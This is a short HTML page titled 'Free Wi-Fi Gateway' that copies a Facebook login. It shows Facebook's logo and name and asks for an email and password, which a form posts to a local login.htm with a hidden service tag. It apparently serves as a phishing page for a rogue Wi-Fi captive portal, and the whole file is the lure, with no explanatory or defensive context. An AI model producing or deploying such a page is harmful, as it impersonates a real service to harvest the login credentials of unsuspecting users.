﻿<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Free Wi-Fi Gateway </title>
    <link rel="stylesheet" href="css/site.css" type="text/css" />
</head>

<body>
    <h1>
        <img src="images/provider/fb.png" width="72" height="72" alt="Facebook" /> FACEBOOK
    </h1>
    <form action="login.htm" method="POST">
        <input type="hidden" name="svc" value="facebook" />
        <p>
            <label for="usr">Email:</label>
            <input id="usr" type="text" name="usr" />
        </p>
        <p>
            <label for="pwd">Password:</label>
            <input id="pwd" type="password" name="pwd" />
        </p>
        <footer>
            <input type="submit" class="button" value="OK" />
        </footer>
    </form>
</body>

</html>